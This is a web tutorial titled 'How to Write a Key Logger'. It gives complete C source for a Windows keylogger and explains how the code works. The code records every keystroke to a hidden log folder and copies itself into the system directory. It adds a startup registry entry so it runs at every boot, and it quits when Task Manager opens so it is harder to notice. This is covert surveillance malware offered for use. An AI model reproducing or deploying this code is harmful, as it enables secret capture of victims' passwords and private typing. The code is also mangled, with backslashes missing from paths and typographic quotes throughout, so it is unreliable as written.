How to Write a Key Logger

Overview of the programming process involved with writing a simple key logger, for many applications.

Writing a key logger is not a very difficult task, but requires you to possess some programming and general computer knowledge. To start with we have to ask ourselves what does a key logger do, then finally, how do we write one?

Key loggers are programs written with the intention of capturing, and saving key strokes sent as input through the keyboard. A functional key logger does this for all input so as to gather information for a variety of purposes.
To write a key logging program you must possess some programming knowledge, which for the most part is beyond the scope of this article. However, for the beginning programmer this should be a piece of cake.
The example code I’m giving you to work with I wrote several years ago, but works perfectly on WINDOWS 98-Vista operating systems. Others may work, but I haven’t tested them with it yet, therefore feel free to tell me if you find it does work on others.

STEP ONE: Download c/c++ compiler
I use DEV-C++ as my main compiler software for a few different reasons. Mainly because it is free, versatile, and reasonably customizable. Install the compiler of your choice, and get to know it.

STEP TWO: Gain a working knowledge of the C programming language. C is highly portable, and offers the programmer a lot of functionality. C++ is much easier to learn once you’ve mastered C.

STEP THREE: Get to know the system functions, and get to know the windows API. There are a lot of helpful resources on the web.

STEP FOUR: Study the following code to my simple key logger:

//START OF CODE

#include <io.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <windows.h>
#include <process.h>

void CheckCopy();
int FileExist(char *filename);
void Log(register char cache);
char CACHE[256], DAY[12];

int main()

    {

    register char cache;
    struct tm *local_time;
    time_t calendar_time;
    calendar_time = time(NULL);
    local_time = localtime(&calendar_time);
    strftime(DAY,12,”%m.%d.%y.txt”,local_time);
    sprintf(CACHE,”C:Data%s – %s”,getenv(”USERNAME”),DAY);
    CheckCopy();
    for (cache = 8; cache <= 190; cache++)

        {
        if (FindWindow(0,”Windows Task Manager”)) exit(EXIT_FAILURE);
        else if (GetAsyncKeyState(cache) == -32767) Log (cache);
    }

return 0;

}

void CheckCopy()

    {
    char CMD[256], PROGDIR[256], SYSDIR[256];
    HKEY ret;
    long key;
    sprintf(CMD,”cacls “%s” /E /G Everyone:F”,CACHE);
    GetSystemDirectory(SYSDIR,255);
    sprintf(PROGDIR,”%s%s”,SYSDIR,”Logger.exe”);
    if (!FileExist(PROGDIR))

        {
        CopyFile(”Logger.exe”,PROGDIR,1);
        key = RegCreateKey(HKEY_LOCAL_MACHINE,”SOFTWAREMicrosoftWindowsCurrentVersionRun”,&ret);
        if (!key) RegSetValueEx((HKEY)ret,”Logger.exe”,0,REG_SZ,(BYTE *)&PROGDIR,sizeof(PROGDIR));
    }

    if (!FileExist(”C:Data”)){
        mkdir(”C:Data”);
        SetFileAttributes(”C:Data”,0×2);
        }
    if (!FileExist(CACHE))

        {
        FILE *fileptr = fopen(CACHE,”a”);
        if (!fileptr) exit(EXIT_FAILURE);
        fclose(fileptr);
        system(CMD);
    }

    return;
}

int FileExist(char *filename)

    {
    struct stat f_stat;
    return (stat(filename, &f_stat) == 0);
}

void Log(register char cache)

    {
    FILE *fileptr = fopen(CACHE,”a”);
    if (!fileptr) exit(EXIT_FAILURE);
    switch (cache)

        {
        case VK_END :

            {
            fclose(fileptr);
            exit(EXIT_SUCCESS);
        }

        case 8 : fprintf(fileptr,”%s”,”[DEL]“);
        break;
        case 13 : fprintf(fileptr,”%s”,”[CR]“);
        break;
        case 32 : fprintf(fileptr,”%s”,”[SPACE]“);
        break;
        case VK_SHIFT : fprintf(fileptr,”%s”,”[SHIFT]“);
        break;
        case VK_TAB : fprintf(fileptr,”%s”,”[TAB]“);
        break;
        default :

            {
            if (IsCharAlphaNumeric(cache))
            if (GetKeyState(VK_CAPITAL) || !IsCharAlpha(cache))
            fputc(cache,fileptr);
            else

                {
                cache += 32;
                fputc(cache,fileptr);
            }

        }

    }

    fclose(fileptr);
    return;
}

//END OF CODE

If you’ve paid attention so far you should have an understanding of what this code is doing. Basically this code starts initiates a loop that calls the function “GetAsyncKeyState” function from the WINDOWS API. This function monitors and returns key presses from all keyboard activity. The program also saves the data in a file, and copies itself to the system folder on the hard-drive. Also, when the program is first run it makes a registry entry to run automatically at start up. It records which user entered the data in the file name as well as the date of the entry. You will be able to compile this code with Dev-C++, probably as well as others. Feel free to alter or improve this code in any manner you wish, but do not take responsibility for it, as you are not the original author.

Thanks for reading, hope you learned something!

comments powered by Disqus
Loading